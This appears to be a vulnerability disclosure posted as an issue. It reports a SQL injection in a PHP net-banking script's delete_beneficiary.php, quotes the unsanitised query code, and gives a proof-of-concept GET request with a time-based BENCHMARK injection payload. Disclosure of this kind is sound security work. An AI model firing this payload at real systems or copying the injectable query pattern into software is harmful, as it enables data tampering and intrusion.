Found a vulnerability
Opened this issue · 0 comments
0clickjacking0 commented
Vulnerability file address
net-banking/delete_beneficiary.php from line 17,The $_GET['cust_id'] parameter is controllable, the parameter cust_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 21 if (($conn->query($sql0) === TRUE)) made a sql query,resulting in sql injection
......
......
......
if (isset($_GET['cust_id'])) {
$sql0 = "DELETE FROM beneficiary".$_SESSION['loggedIn_cust_id'].
" WHERE benef_cust_id=".$_GET['cust_id'];
}
$success = 0;
if (($conn->query($sql0) === TRUE)) {
$sql0 = "SELECT MAX(benef_id) FROM beneficiary".$_SESSION['loggedIn_cust_id'];
$result = $conn->query($sql0);
$row = $result->fetch_assoc();
......
......
......POC
GET /net-banking/delete_beneficiary.php?cust_id=666 AND 3629=BENCHMARK(5000000,MD5(0x7a6f6b4e)) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Upgrade-Insecure-Requests: 1